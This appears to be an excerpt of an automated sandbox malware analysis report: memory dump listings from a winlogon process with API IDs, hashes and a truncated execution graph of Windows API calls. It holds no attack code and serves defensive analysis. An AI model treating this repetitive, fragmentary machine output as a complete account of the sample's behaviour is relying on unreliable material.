                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: eb36fadbe95ae4008ab3f261c906c7f475cc0eb0bc5e66f0e274ae4c17083868
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: BAD1F03A728EA0A9E712CFA9D4482DC37B1F754B99F508216CF5E97B99DB34C046C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction ID: 9e471798156c1280565bf6b792fcdfecfe05ab569b43954ffdfafa451b690551
                                                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                          • Instruction Fuzzy Hash: 5951252E204FA0E2EA26CEBEA55C3AA6795F7C4B81F548925CE4943FC9DE3DC440C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: e11b2a7f3edbef56172184a7c16dc2fd0d47df3306e2381dbbce4523e57785be
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: 28515D3E2C4FA061E625DFBDA45C3AA6791F395B82F248025CD4DC3B99DE39CA40C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 5d2149fe6c3e78c39011a294a18c6bd9ab588e09121204414753852e3327650c
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 3C41F776625E90A6E710DFA9E44C79EB7A4F358785FA08121EE4D87798EB38C441CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 5200b0a9beee72a8b1e71db727fb4ee46784548cd1607bea0f068cb2e68ac69f
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 95410936625E90A6EB10CFA9E44C79AB7A4F748785F908122EE4D87798EF3CC441C741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: e0c351baf4859c10e77ba76a6590d0cc1abded0191d3b1c089e69e04578efc60
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 37411736725EA0A6E710DFA9E4487DAB7E1F358786F908121EE4D87758EF38C401CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: db6eb38841bde54c5dd188d0259e07b469649840c4da86e6cd179dda64078316
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: 18113036218F5492EB218F19F44825977E5F788B95F588260DF8D07B58EF3CC551CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: 7226e3522b5125ddb551aa3a57fb97c0fa8ea7e3dcbb6584f8f0b196ce66b00f
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: EA113036214F5492EB218F19F44825977E5FB88B95F588624DF8D07B98EF3CC551CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: fa1202d324cfbd0c8970eb7c3b42d5f78d3a1867e87e940416cdeefa60ff0339
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: F1112E36214F5492EB61CB19F44825977E5F788B95F688220DF8D47B59EF3CC951CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: ca64aea31b89ef05092247e0b654ff125d18e1aed59babf1c68cbec64ae6055e
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: B6116D29A15F90A5EA14CBAAE80C25977F1F788FD1F688124DE4E53765EF38D442C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: ef720a90cd906b7f5869c837cfcecf23e1a7b74f588bf74dcced3a09afb9df82
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 8A118029A11F90A5EE14CBAAA80C25977F0FB88FD1F588125DE8E537A5EF38D442C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: bccaa72d9641499ade5178cec18e2b7def748411dc5829a48323c92040d00650
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 30118429615F90E5EE15DBAAA40819977F1F788FD2F588124DE4E93765EF38D442C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 0deb5c519183e292ab043531c625829c76551796b07e63a5a63a9173b0e6b41d
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 40E09A35A21A14AAE7288FA6D80C3493AE1FB8CF06F58C024C90907360FF7DC4D9CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: bf93436e8b06f2ff5ad44ff40c5e4fad4cbd51e911b6f2727cba50eb4f4d7872
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 9FE06D35641A14AAF714CFA6D80C34936E1FF88F06F44C024C98907390EF7D8499C742
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 0a1c56e25ee5db3eb0535300d2575e74568581a8c9c731ae2c8e461e2ccff497
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: B7E06535A11A14AAE7288FA6D80C38936E2FB98F07F48C024C90D07360EF7D8499CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 4e31467a791c9597f993cc1cc15cf2794c9e3848138c65830c0539e2b7d329e9
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: BDE01A75621A14ABE7289FA6DC0C3597AE1FB8CF16F98C024C90907320FE3CD499DB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 23fe0bf58cde12441d7855fc1d5244312edb8ab1c4b39374223f342a299c4fd6
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 2AE0E575651A14AAF728DBA6D80825976A1FF88F16F88C024C949073A0FE388499DB12
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 4c756b871459276bfd73525a54b91d6da620adeb0992020cc646d42d4f2ae7cf
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: CDE01A75621A14ABE7299FA6DC0839976E2FB9CF17F88C024C90D07320FE3C8499DB11

                                                          Execution Graph

                                                          Execution Coverage: 1.9%
                                                          Dynamic/Decrypted Code Coverage: 0%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 1463
                                                          Total number of Limit Nodes: 17
                                                          execution_graph 8516 202c0ae2ff0 8517 202c0ae3061 8516->8517 8518 202c0ae3384 8517->8518 8519 202c0ae308d GetModuleHandleA 8517->8519 8520 202c0ae30b1 8519->8520 8521 202c0ae309f GetProcAddress 8519->8521 8520->8518 8522 202c0ae30d8 StrCmpNIW 8520->8522 8521->8520 8522->8518 8528 202c0ae30fd 8522->8528 8523 202c0ae1a30 6 API calls 8523->8528 8524 202c0ae320f lstrlenW 8524->8528 8525 202c0ae32b9 lstrlenW 8525->8528 8526 202c0ae1cfc StrCmpIW StrCmpW 8526->8528 8527 202c0ae3f88 StrCmpNIW 8527->8528 8528->8518 8528->8523 8528->8524 8528->8525 8528->8526 8528->8527 7709 202c0aef870 7710 202c0aef8a0 7709->7710 7712 202c0aef8c7 7709->7712 7711 202c0aecb10 __std_exception_copy 13 API calls 7710->7711 7710->7712 7715 202c0aef8b4 7710->7715 7711->7715 7713 202c0aef99c 7712->7713 7735 202c0aec558 EnterCriticalSection 7712->7735 7716 202c0aef9ca 7713->7716 7717 202c0aefab3 7713->7717 7730 202c0aefa03 7713->7730 7715->7712 7718 202c0aef949 7715->7718 7726 202c0aef904 7715->7726 7716->7730 7736 202c0aecab0 7716->7736 7723 202c0aefac0 7717->7723 7745 202c0aec5ac LeaveCriticalSection 7717->7745 7719 202c0aed1f4 __std_exception_copy 13 API calls 7718->7719 7722 202c0aef94e 7719->7722 7732 202c0aed04c 7722->7732 7727 202c0aef9f3 7729 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7727->7729 7728 202c0aefa61 7731 202c0aecab0 14 API calls _invalid_parameter_noinfo 7728->7731 7729->7730 7730->7728 7744 202c0aec5ac LeaveCriticalSection 7730->7744 7731->7728 7746 202c0aecef8 7732->7746 7737 202c0aecb10 __std_exception_copy 13 API calls 7736->7737 7738 202c0aecab9 7737->7738 7739 202c0aecabe 7738->7739 7740 202c0aecae8 FlsGetValue 7738->7740 7742 202c0aecae4 7738->7742 7739->7727 7740->7742 7741 202c0aecafe 7741->7727 7742->7741 7743 202c0aec940 _invalid_parameter_noinfo 13 API calls 7742->7743 7743->7741 7747 202c0aecf23 7746->7747 7754 202c0aecf94 7747->7754 7749 202c0aecf4a 7753 202c0aecf6d 7749->7753 7764 202c0aec3e0 
7749->7764 7750 202c0aecf82 7750->7726 7752 202c0aec3e0 _invalid_parameter_noinfo 17 API calls 7752->7750 7753->7750 7753->7752 7777 202c0aeccc8 7754->7777 7759 202c0aecfcf 7759->7749 7765 202c0aec3ef GetLastError 7764->7765 7766 202c0aec438 7764->7766 7767 202c0aec404 7765->7767 7766->7753 7768 202c0aecba0 _invalid_parameter_noinfo 14 API calls 7767->7768 7769 202c0aec41e SetLastError 7768->7769 7769->7766 7770 202c0aec441 7769->7770 7771 202c0aec3e0 _invalid_parameter_noinfo 15 API calls 7770->7771 7772 202c0aec467 7771->7772 7817 202c0aeffe8 7772->7817 7778 202c0aecd1f 7777->7778 7779 202c0aecce4 GetLastError 7777->7779 7778->7759 7783 202c0aecd34 7778->7783 7780 202c0aeccf4 7779->7780 7790 202c0aecba0 7780->7790 7784 202c0aecd50 GetLastError SetLastError 7783->7784 7785 202c0aecd68 7783->7785 7784->7785 7785->7759 7786 202c0aed06c IsProcessorFeaturePresent 7785->7786 7787 202c0aed07f 7786->7787 7795 202c0aecd80 7787->7795 7791 202c0aecbc8 FlsGetValue 7790->7791 7792 202c0aecbc4 7790->7792 7791->7792 7793 202c0aecbde SetLastError 7792->7793 7794 202c0aec940 _invalid_parameter_noinfo 13 API calls 7792->7794 7793->7778 7794->7793 7796 202c0aecdba _invalid_parameter_noinfo 7795->7796 7797 202c0aecde2 RtlCaptureContext RtlLookupFunctionEntry 7796->7797 7798 202c0aece2e RtlVirtualUnwind 7797->7798 7799 202c0aece64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7797->7799 7798->7799 7800 